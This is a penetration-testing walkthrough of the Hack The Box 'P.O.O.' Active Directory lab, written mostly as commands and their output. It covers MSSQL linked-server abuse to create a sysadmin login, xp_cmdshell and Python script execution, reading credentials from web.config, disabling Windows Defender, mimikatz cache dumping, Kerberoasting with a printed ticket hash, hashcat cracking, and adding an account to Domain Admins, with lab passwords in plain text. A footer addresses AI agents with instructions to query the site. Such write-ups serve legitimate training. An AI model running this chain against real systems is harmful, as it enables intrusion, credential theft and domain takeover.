> For the complete documentation index, see [llms.txt](https://dcollao.gitbook.io/my-pentest-book/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dcollao.gitbook.io/my-pentest-book/writeups/htb-hackthebox/htb-advanced-labs/endgames/p.o.o..md). # P.O.O. ### ### **Introducción** **Professional Offensive Operations** By [eks](https://app.hackthebox.com/home/users/profile/302) and [mrb3n](https://app.hackthebox.com/home/users/profile/2984) Professional Offensive Operations is a rising name in the cyber security world. Lately they've been working into migrating core services and components to a state of the art cluster which offers cutting edge software and hardware. P.O.O. is designed to put your skills in enumeration, lateral movement, and privilege escalation to the test within a small Active Directory environment that is configured with the latest operating systems and technologies. The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way. Entry Point: `10.13.38.11` *** ## Enumeration ``` ping -c 1 10.13.38.11 -R ```

### NMAP Scans ``` nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.13.38.11 -oG allPorts ```

``` nmap -p80,1433 -sCV 10.13.38.11 -oN targeted ``` ```bash # Nmap 7.94SVN scan initiated Fri Mar 29 18:18:25 2024 as: nmap -p80,1433 -sCV -oN targeted 10.13.38.11 Nmap scan report for 10.13.38.11 Host is up (0.26s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS Windows Server |_http-server-header: Microsoft-IIS/10.0 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+ |_ssl-date: 2024-03-29T22:18:45+00:00; +4s from scanner time. | ms-sql-ntlm-info: | 10.13.38.11:1433: | Target_Name: POO | NetBIOS_Domain_Name: POO | NetBIOS_Computer_Name: COMPATIBILITY | DNS_Domain_Name: intranet.poo | DNS_Computer_Name: COMPATIBILITY.intranet.poo | DNS_Tree_Name: intranet.poo |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-03-29T19:52:54 |_Not valid after: 2054-03-29T19:52:54 | ms-sql-info: | 10.13.38.11:1433: | Version: | name: Microsoft SQL Server 2017 RTM+ | number: 14.00.2027.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: true |_ TCP port: 1433 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 3s, deviation: 0s, median: 3s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Mar 29 18:18:41 2024 -- 1 IP address (1 host up) scanned in 16.08 seconds ``` ### Bruteforce Directories ``` dirsearch -u 10.13.38.11 ```

### DS Enumeration Directory {% embed url="" %} DS\_Walk Repository {% endembed %} ``` python ds_walk.py -u http://10.13.38.11 ``` {% code title="Output of ds\_walk.py" %} ```bash [32m[!] .ds_store file is present on the webserver.0m [32m[+] Enumerating directories based on .ds_server file:0m ---------------------------- [!] http://10.13.38.11/admin [!] http://10.13.38.11/dev [!] http://10.13.38.11/iisstart.htm [!] http://10.13.38.11/Images [!] http://10.13.38.11/JS [!] http://10.13.38.11/META-INF [!] http://10.13.38.11/New folder [!] http://10.13.38.11/New folder (2) [!] http://10.13.38.11/Plugins [!] http://10.13.38.11/Templates [!] http://10.13.38.11/Themes [!] http://10.13.38.11/Uploads [!] http://10.13.38.11/web.config [!] http://10.13.38.11/Widgets ---------------------------- [!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1 [!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc ---------------------------- [!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/core [!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db [!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/include [!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/src ---------------------------- [!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/core [!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db [!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/include [!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/src ---------------------------- [!] http://10.13.38.11/Images/buttons [!] http://10.13.38.11/Images/icons [!] http://10.13.38.11/Images/iisstart.png ---------------------------- [!] http://10.13.38.11/JS/custom ---------------------------- [!] http://10.13.38.11/Themes/default ---------------------------- [!] http://10.13.38.11/Widgets/CalendarEvents [!] http://10.13.38.11/Widgets/Framework [!] http://10.13.38.11/Widgets/Menu [!] http://10.13.38.11/Widgets/Notifications ---------------------------- [!] http://10.13.38.11/Widgets/Framework/Layouts ---------------------------- [!] http://10.13.38.11/Widgets/Framework/Layouts/custom [!] http://10.13.38.11/Widgets/Framework/Layouts/default ---------------------------- [32m[*] Finished traversing. No remaining .ds_store files present.0m [32m[*] Cleaning up .ds_store files saved to disk.0m ``` {% endcode %} ### IIS Shortname Scanner {% embed url="" %} ``` python3 iis_shortname_scanner.py http://10.13.38.11/ python3 iis_shortname_scanner.py http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/ python3 iis_shortname_scanner.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/ ```

``` poo_co~1.txt _co%%%% ``` ### Path bruteforce with WFUZZ ```bash grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > co_fuzz.txt wc -l co_fuzz.txt wfuzz -c -w co_fuzz.txt -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt --hc 404 curl 10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt ```

### MSSQL Enumeration / Linkcrawler

msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
run

search mssql
use exploit/windows/mssql/mssql_linkcrawler
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11

### Installing USQL for client to MSSQL ``` go install -tags most github.com/xo/usql@latest usql \c mssql://external_user@10.13.38.11:1433 #p00Public3xt3rnalUs3r# ```

### MSSQL Enumeration ```sql SELECT name FROM sys.databases; ```

```sql SELECT suser_name(); SELECT name,sysadmin FROM syslogins; SELECT srvname, isremote FROM sysservers; ```

```sql SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select current_user'); SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select name,sysadmin from syslogins'); SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select srvname,isremote from sysservers'); ```

```sql SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'EXECUTE(''SELECT * FROM OPENQUERY([COMPATIBILITY\POO_PUBLIC], ''''SELECT SUSER_NAME();'''');'')'); SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');'); ``` ```sql SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",select * from openquery("COMPATIBILITY\POO_PUBLIC", ''select name from master.dbo.sysdatabases'')'); ``` ## Adding Username to the DB ```sql EXECUTE('EXECUTE(''EXEC master..sp_addlogin ''''3ky'''', ''''3ky123!'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG"; ``` ```sql EXECUTE('EXECUTE(''EXEC master..sp_addsrvrolemember ''''3ky'''',''''sysadmin'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG"; ``` ### Check Username

msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD 3ky123!
set USERNAME 3ky
set RHOST 10.13.38.11
run

### XP\_cmdshell ```sql sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123! xp_cmdshell 'whoami'; go ``` ### Enabling external scripts ```sql EXEC sp_configure 'external scripts enabled', 1 reconfigure go ``` ### Using external scripts (example) ```sql EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("whoami")' go ``` ### Type web.config for extract administrator credentials. ```sql EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("type C:\\inetpub\\wwwroot\\web.config")' go ```

```sql EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("netstat -ano")' go ```

```bash echo "dead:beef::1001 compatibility.htb" | sudo tee -a /etc/hosts ``` ### Evil-WinRM ``` evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O." ```

```batch net user administrator ```

```powershell Set-MpPreference -DisableRealtimeMonitoring $true ``` ### Mimikatz.exe {% embed url="" %}

```bash .\mimikatz.exe token::elevate lsadump::cache exit ```

### Invoke-Kerberoast.ps1 {% embed url="" %}

```sql sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123! xp_cmdshell 'powershell -exec bypass -c "import-module C:\temp\invoke-kerberoast.ps1; invoke-kerberoast -outputformat haschat | f1"' go ``` {% code overflow="wrap" %} ``` $krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$A645B9CC69231DECE1D6EA7597FB0E47$83861CAE6474DF369FBC7DA10206403F8460129473B851720026FCD45D4FB62EDCD4A13024BF16DC09BF337F6EBA54FFF32308E523A1A9521211731C7108C712ABA91227A0051ABDEDD9CFA769A7AAAC8997163F0AF9DF29CF4E96276A044751340D8F26A3BE509A2FAC9E13B4EF851B8905180DD0C4B374A9133EC007DA9E54228613A91DCBA56879E42CAC146D0178BD936FB88C9271DB4338100E5DF1A81AF3F36D61C435984A5CF9B02FC8DB077F16C8921C22FAADF78B5B91447FD1B3DADA006663BD91FD0A5E5F3B33593F3C47AF2CE1C4A863C7DC3DCAE9F5EE8E0B980199DC7F6E9AC85E661BEADFAD7B219CBE0B60C822A61FFF2152E9E71FBE3E3E82E26C513AE664AC2C1312183D99136D70EF8FFC7DBA9CE8B49D941737BF18D511D11BCD004FA7EBB37469FCA6BFCCD6E281363DA5AEC48B0A92F34039812EDB042ADD4B9E22D89BC1402D3760D417E7C84022954B70FCE28B629BEA40A3F3EB88895A49B9039D3421E0BA17D5578927CC6E006C9859E9FF7BB1F7FAAFBC733FAAE18FB726B67D4EF1643B4B88F227A0B1794C0EA05D7996C565BA85DFDDFC0ED4E2D3FF66AB13763E91937B258FDCFCCA02FF53DF48B45086E89CEC99E898C2DD4A5E12DD53EBC9F4325A2F45A1EE895F6FDD2324AFC629243AFEFA098C714D863FE8C6A198DABF661563D106C767BAAEE3D27911EB701D49DCD702CA121E110125EE1DB0F759BF53E6E6DABBA7863638DC09A420C15638B830A869FB359DD1367FFBDA04EAD4711B2BDBA9B7B9D4AAEFB819A25CC358943A234CB262CB3B1FD69FC1D9724A01AC46B711917C6B1D9DDFA2F623FC7C0E1444522BF84C0FC5A1943DCC6D074EE151CB1B25C2A50F91A465086DAFEF44A7ABEC8463E8B3B33E922E1648458609220C2B79F2C264C5FEA08AF969F64A5C05E2D2570CCA9BB401263CCBE851FA15C554C2C021EFF2FB9A293ACF898F67296407CF2ADDEE36B8BAD716FB61C8800BAD049CE63A7AA31D8D7891D47028EC26E4900F883F6C9B7FDA430D1B1602F2D969F6BDBEEBEB5A0E40655B1DCE23CA43C2A3FCF2AB4B34D872D0BE0A58C17194FE3B1726031B7909A37D2C470CF61AAF204E1942E2E1B78D11F3921B4F03CFD68F23BB702ADF84EF2D99F75D91CBD5183E450BDE04236BAB0C66F42AD7141B1AFB7963E56B37668AE24ADA1B378C8D9993AE5723C0B0FC11A8372EB738D18988D90C736D1A4B3979CE16C344FD3B33B957756F5C5C03AD3978DC912A048A9EBCA6A244CE84AEA74D57066DA235CCA373571DCE88A0B8D21A4053C9ABC075C4208164E10D9762A9F06193BA833261F245D525A38FF590DFBA50D9FD29B6997D094D9C592D2F92AA3BEC0441126EBBFCE6105FDDD5135654820F6221C2CE12B6AFE5E4B403E488616313874FBEB4452037BA63964051DAE064F9503E9740B4C5E51F24CE795B8FF078ECC6D0E1E642A383C8AAFCBAD5A822 ``` {% endcode %} {% code overflow="wrap" %} ```bash hashcat -a0 -m 13100 hash.txt /usr/share/wordlists/seclists/Passwords/Keyboard-Combinations.txt ``` {% endcode %}

``` ZQ!5t4r ``` ### Sharphound {% embed url="" %}

``` sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123! xp_cmdshell 'cd C:\temp && SharpHound.exe -c all' go ``` ### PowerView\.ps1 {% embed url="" %} {% code overflow="wrap" %} ```bash evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O." -s . ``` {% endcode %}

``` $user = 'intranet.poo\p00_adm' $pass = ConvertTo-SecureString -AsPlainText 'ZQ!5t4r' -Force -AsPlainText $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass Add-DomainGroupMember -Identity "Domain Admins" -Members "p00_adm" -Credential $cred $pass = ConvertTo-SecureString -AsPlainText 'ZQ!5t4r' -Force -AsPlainText $cred = New-Object -TypeName System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass) Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $Cred ```

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dcollao.gitbook.io/my-pentest-book/writeups/htb-hackthebox/htb-advanced-labs/endgames/p.o.o..md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.